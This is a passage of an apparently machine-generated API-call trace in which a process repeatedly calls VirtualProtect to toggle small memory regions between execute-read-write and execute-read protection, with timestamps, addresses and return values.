flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.826] VirtualProtect (in: lpAddress=0x1e700f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.826] VirtualProtect (in: lpAddress=0x1e700f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.826] VirtualProtect (in: lpAddress=0x1e822fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.826] VirtualProtect (in: lpAddress=0x1e822fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.827] VirtualProtect (in: lpAddress=0x1e82378, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.827] VirtualProtect (in: lpAddress=0x1e82378, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.827] VirtualProtect (in: lpAddress=0x1e82390, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.827] VirtualProtect (in: lpAddress=0x1e82390, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.827] VirtualProtect (in: lpAddress=0x1e82397, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.828] VirtualProtect (in: lpAddress=0x1e82397, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.828] VirtualProtect (in: lpAddress=0x1e8239f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.828] VirtualProtect (in: lpAddress=0x1e8239f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.828] VirtualProtect (in: lpAddress=0x1e823a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.828] VirtualProtect (in: lpAddress=0x1e823a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.828] VirtualProtect (in: lpAddress=0x1e823a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.829] VirtualProtect (in: lpAddress=0x1e823a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.829] VirtualProtect (in: lpAddress=0x1e823ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.829] VirtualProtect (in: lpAddress=0x1e823ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.829] VirtualProtect (in: lpAddress=0x1e823d5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.829] VirtualProtect (in: lpAddress=0x1e823d5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.830] VirtualProtect (in: lpAddress=0x1e823fb, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.830] VirtualProtect (in: lpAddress=0x1e823fb, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.830] VirtualProtect (in: lpAddress=0x1e82419, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.830] VirtualProtect (in: lpAddress=0x1e82419, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.830] VirtualProtect (in: lpAddress=0x1e82420, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.830] VirtualProtect (in: lpAddress=0x1e82420, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.831] VirtualProtect (in: lpAddress=0x1e82424, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.831] VirtualProtect (in: lpAddress=0x1e82424, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.831] VirtualProtect (in: lpAddress=0x1e82428, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.831] VirtualProtect (in: lpAddress=0x1e82428, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.831] VirtualProtect (in: lpAddress=0x1e8242c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.832] VirtualProtect (in: lpAddress=0x1e8242c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.832] VirtualProtect (in: lpAddress=0x1e82430, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.832] VirtualProtect (in: lpAddress=0x1e82430, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.832] VirtualProtect (in: lpAddress=0x1e82434, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.832] VirtualProtect (in: lpAddress=0x1e82434, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.832] VirtualProtect (in: lpAddress=0x1e82438, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.833] VirtualProtect (in: lpAddress=0x1e82438, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.833] VirtualProtect (in: lpAddress=0x1e8243c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.833] VirtualProtect (in: lpAddress=0x1e8243c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.833] VirtualProtect (in: lpAddress=0x1e82486, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.833] VirtualProtect (in: lpAddress=0x1e82486, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.834] VirtualProtect (in: lpAddress=0x1e8248c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.834] VirtualProtect (in: lpAddress=0x1e8248c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.834] VirtualProtect (in: lpAddress=0x1e82490, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.834] VirtualProtect (in: lpAddress=0x1e82490, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.834] VirtualProtect (in: lpAddress=0x1e82494, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.835] VirtualProtect (in: lpAddress=0x1e82494, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.835] VirtualProtect (in: lpAddress=0x1e82498, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.835] VirtualProtect (in: lpAddress=0x1e82498, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.835] VirtualProtect (in: lpAddress=0x1e824fe, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.835] VirtualProtect (in: lpAddress=0x1e824fe, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.835] VirtualProtect (in: lpAddress=0x1e82509, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.836] VirtualProtect (in: lpAddress=0x1e82509, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.836] VirtualProtect (in: lpAddress=0x1e82524, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.836] VirtualProtect (in: lpAddress=0x1e82524, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.836] VirtualProtect (in: lpAddress=0x1e8252b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.836] VirtualProtect (in: lpAddress=0x1e8252b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.836] VirtualProtect (in: lpAddress=0x1e82530, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.837] VirtualProtect (in: lpAddress=0x1e82530, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.837] VirtualProtect (in: lpAddress=0x1e82534, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.837] VirtualProtect (in: lpAddress=0x1e82534, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.837] VirtualProtect (in: lpAddress=0x1e82538, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.837] VirtualProtect (in: lpAddress=0x1e82538, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.838] VirtualProtect (in: lpAddress=0x1e82559, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.838] VirtualProtect (in: lpAddress=0x1e82559, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.838] VirtualProtect (in: lpAddress=0x1e82583, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.838] VirtualProtect (in: lpAddress=0x1e82583, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.838] VirtualProtect (in: lpAddress=0x1e825b5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.839] VirtualProtect (in: lpAddress=0x1e825b5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.839] VirtualProtect (in: lpAddress=0x1e825bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.839] VirtualProtect (in: lpAddress=0x1e825bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.839] VirtualProtect (in: lpAddress=0x1e825c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.839] VirtualProtect (in: lpAddress=0x1e825c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.839] VirtualProtect (in: lpAddress=0x1e825c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.840] VirtualProtect (in: lpAddress=0x1e825c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.840] VirtualProtect (in: lpAddress=0x1e825c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.840] VirtualProtect (in: lpAddress=0x1e825c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.840] VirtualProtect (in: lpAddress=0x1e825cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.840] VirtualProtect (in: lpAddress=0x1e825cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.841] VirtualProtect (in: lpAddress=0x1e825d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.841] VirtualProtect (in: lpAddress=0x1e825d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.841] VirtualProtect (in: lpAddress=0x1e825d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.841] VirtualProtect (in: lpAddress=0x1e825d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.841] VirtualProtect (in: lpAddress=0x1e825d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.841] VirtualProtect (in: lpAddress=0x1e825d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.842] VirtualProtect (in: lpAddress=0x1e82622, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.842] VirtualProtect (in: lpAddress=0x1e82622, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.842] VirtualProtect (in: lpAddress=0x1e82628, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.842] VirtualProtect (in: lpAddress=0x1e82628, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.842] VirtualProtect (in: lpAddress=0x1e8262c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.843] VirtualProtect (in: lpAddress=0x1e8262c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.843] VirtualProtect (in: lpAddress=0x1e82630, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.843] VirtualProtect (in: lpAddress=0x1e82630, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.843] VirtualProtect (in: lpAddress=0x1e82634, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.843] VirtualProtect (in: lpAddress=0x1e82634, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.843] VirtualProtect (in: lpAddress=0x1e8ba04, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.844] VirtualProtect (in: lpAddress=0x1e8ba04, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.844] VirtualProtect (in: lpAddress=0x1e8ba08, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.844] VirtualProtect (in: lpAddress=0x1e8ba08, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.844] VirtualProtect (in: lpAddress=0x1e8ba28, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.844] VirtualProtect (in: lpAddress=0x1e8ba28, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.845] VirtualProtect (in: lpAddress=0x1e8ba44, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.845] VirtualProtect (in: lpAddress=0x1e8ba44, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.845] VirtualProtect (in: lpAddress=0x1e8ba48, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.845] VirtualProtect (in: lpAddress=0x1e8ba48, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.845] VirtualProtect (in: lpAddress=0x1e8ba68, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.846] VirtualProtect (in: lpAddress=0x1e8ba68, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.846] VirtualProtect (in: lpAddress=0x1e8ba88, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.846] VirtualProtect (in: lpAddress=0x1e8ba88, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.846] VirtualProtect (in: lpAddress=0x1e8baa8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.846] VirtualProtect (in: lpAddress=0x1e8baa8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.846] VirtualProtect (in: lpAddress=0x1e8bac8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.847] VirtualProtect (in: lpAddress=0x1e8bac8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.847] VirtualProtect (in: lpAddress=0x1e8bae8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.847] VirtualProtect (in: lpAddress=0x1e8bae8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.847] VirtualProtect (in: lpAddress=0x1e8bb08, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.847] VirtualProtect (in: lpAddress=0x1e8bb08, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.848] VirtualProtect (in: lpAddress=0x1e8bb14, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.848] VirtualProtect (in: lpAddress=0x1e8bb14, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.848] VirtualProtect (in: lpAddress=0x1e8bb1c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.848] VirtualProtect (in: lpAddress=0x1e8bb1c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.848] VirtualProtect (in: lpAddress=0x1e8bb20, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.848] VirtualProtect (in: lpAddress=0x1e8bb20, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.849] VirtualProtect (in: lpAddress=0x1e8bb28, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.849] VirtualProtect (in: lpAddress=0x1e8bb28, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.849] VirtualProtect (in: lpAddress=0x1e8bb2c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.850] VirtualProtect (in: lpAddress=0x1e8bb2c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.850] VirtualProtect (in: lpAddress=0x1e8bb44, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.850] VirtualProtect (in: lpAddress=0x1e8bb44, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.850] VirtualProtect (in: lpAddress=0x1e8bb48, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.850] VirtualProtect (in: lpAddress=0x1e8bb48, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.850] VirtualProtect (in: lpAddress=0x1e8bb68, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.851] VirtualProtect (in: lpAddress=0x1e8bb68, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.851] VirtualProtect (in: lpAddress=0x1e8bb88, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.851] VirtualProtect (in: lpAddress=0x1e8bb88, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.851] VirtualProtect (in: lpAddress=0x1e8bba8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.851] VirtualProtect (in: lpAddress=0x1e8bba8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.852] VirtualProtect (in: lpAddress=0x1e8bbc8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.852] VirtualProtect (in: lpAddress=0x1e8bbc8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.852] VirtualProtect (in: lpAddress=0x1e8bbe4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.852] VirtualProtect (in: lpAddress=0x1e8bbe4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.852] VirtualProtect (in: lpAddress=0x1e8bbe8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.853] VirtualProtect (in: lpAddress=0x1e8bbe8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.853] VirtualProtect (in: lpAddress=0x1e8bc04, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.853] VirtualProtect (in: lpAddress=0x1e8bc04, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.853] VirtualProtect (in: lpAddress=0x1e8bc08, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.853] VirtualProtect (in: lpAddress=0x1e8bc08, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.853] VirtualProtect (in: lpAddress=0x1e8bc28, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.854] VirtualProtect (in: lpAddress=0x1e8bc28, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.854] VirtualProtect (in: lpAddress=0x1e8bc48, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.854] VirtualProtect (in: lpAddress=0x1e8bc48, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.854] VirtualProtect (in: lpAddress=0x1e8bc68, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.854] VirtualProtect (in: lpAddress=0x1e8bc68, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: 